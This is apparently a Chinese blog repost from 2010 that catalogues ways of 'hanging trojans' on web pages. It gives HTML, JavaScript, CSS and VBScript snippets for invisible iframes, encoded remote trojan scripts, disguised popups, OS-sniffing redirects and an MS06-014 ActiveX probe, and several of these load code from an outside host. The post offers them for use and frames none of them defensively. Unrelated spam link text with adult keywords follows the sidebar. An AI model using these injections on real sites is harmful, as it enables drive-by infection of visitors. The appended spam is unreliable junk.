• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            小默

            【轉(zhuǎn)】常用的掛馬方式和系統(tǒng)判斷等代碼

            一:框架掛馬
            <iframe src=地址 width=0 height=0></iframe>

            二:js文件掛馬
            首先將以下代碼
            document.write("<iframe width=0 height=0 src=地址></iframe>");
            保存為xxx.js,
            則JS掛馬代碼為
            <script language=javascript src=xxx.js></script>

            三:js變形加密
            <SCRIPT language="JScript.Encode" src=http://www.upx.com.cn/muma.txt></script>
            muma.txt可改成任意后綴

            四:body掛馬
            <body onload="window.location=地址;"></body>

            五:隱蔽掛馬
            top.document.body.innerHTML = top.document.body.innerHTML + rn<iframe src=">;

            六:css中掛馬
            body {
            background-image: url(javascript:document.write("<script src=http://www.upx.com.cn/muma.js></script>"))}

            七:JAJA掛馬
            <SCRIPT language=javascript>
            window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
            </script>

            八:圖片偽裝
            <html>
            <iframe src="網(wǎng)馬地址" height=0 width=0></iframe>
            <img src="圖片地址"></center>
            </html>

            九:偽裝調(diào)用:
            <frameset rows="444,0" cols="*">
            <frame src="打開網(wǎng)頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
            <frame src="網(wǎng)馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
            </frameset>

            十:高級欺騙
            <a href="
            <SCRIPT Language="JavaScript">
            function www_163_com ()
            {
            var url="網(wǎng)馬地址";
            open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
            }
            </SCRIPT>

            十一:判斷系統(tǒng)代碼

            <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
            <HTML><HEAD><TITLE>404</TITLE>
            <META http-equiv=Content-Type content="text/html; charset=windows-1252">
            <META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
            <BODY>
            <SCRIPT language=javascript>
            window.status="";
            if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
            window.location.href="tk.htm";
            else
            window.location.href="upx06014.htm";
            </SCRIPT>
            </BODY></HTML>

            十二:判斷是否有ms06014代碼

            <script language=VBScript>
            on error resume next
            set server = document.createElement("object")
            server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
            set File = server.createobject(Adodb.Stream,"")
            if Not Err.Number = 0 then
            err.clear
            document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
            else
            document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")
            end if
            </script>

            十三:智能讀取js的代碼demo

            //讀娶src的對象
            var v = document.getElementById("advjs");
            //讀娶src的參數(shù)
            var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute(src));

            document.write("<iframe src="document.writeln("<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">");
            document.writeln("<HTML><HEAD>");
            document.writeln("<META http-equiv=Content-Type content="text/html; charset=big5">");
            document.writeln("<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>");
            document.writeln("<BODY> ");
            document.writeln("<DIV style="CURSOR: url(
            document.writeln("style="CURSOR: url(

            //分析src的參數(shù)函數(shù)
            function getUrlParameterAdv(asName,lsURL){

            loU = lsURL.split("?");
            if (loU.length>1){

            var loallPm = loU[1].split("&");

            for (var i=0; i<loallPm.length; i++){
            var loPm = loallPm[i].split("=");
            if (loPm[0]==asName){
            if (loPm.length>1){
            return loPm[1];
            }else{
            return "";
            }
            }
            }
            }
            return null;
            }

            posted on 2010-05-15 07:49 小默 閱讀(259) 評論(0)  編輯 收藏 引用 所屬分類: Security

            導航

            統(tǒng)計

            留言簿(13)

            隨筆分類(287)

            隨筆檔案(289)

            漏洞

            搜索

            積分與排名

            最新評論

            閱讀排行榜

            久久国产精品久久精品国产| 久久99国产精品99久久| 狠狠精品久久久无码中文字幕| 97精品国产97久久久久久免费| 欧美精品丝袜久久久中文字幕 | 久久av高潮av无码av喷吹| 久久ZYZ资源站无码中文动漫| 亚洲午夜福利精品久久| 久久精品国产只有精品66| 伊人热人久久中文字幕| 久久福利青草精品资源站免费| 国产一级持黄大片99久久| 国产精品久久久久…| 久久最新精品国产| 97久久精品人人做人人爽| 国产日韩欧美久久| 久久国产成人午夜aⅴ影院| 久久久久亚洲AV综合波多野结衣| 久久久这里有精品中文字幕| 四虎国产精品成人免费久久| 久久只有这里有精品4| 久久精品国产久精国产果冻传媒| 久久国产色av免费看| 久久久av波多野一区二区| 久久亚洲精品中文字幕三区| 久久久99精品成人片中文字幕| 久久久久久国产a免费观看黄色大片| 久久91精品国产91久| 久久综合给合久久狠狠狠97色| 东京热TOKYO综合久久精品| 亚洲国产精品人久久| 亚洲精品无码久久不卡| 久久久久AV综合网成人| 99久久亚洲综合精品网站| 亚洲人成无码www久久久| 久久综合亚洲欧美成人| 日韩精品国产自在久久现线拍| 亚洲精品NV久久久久久久久久| 精品少妇人妻av无码久久| 国产精品美女久久久久av爽| 久久精品国产亚洲AV影院|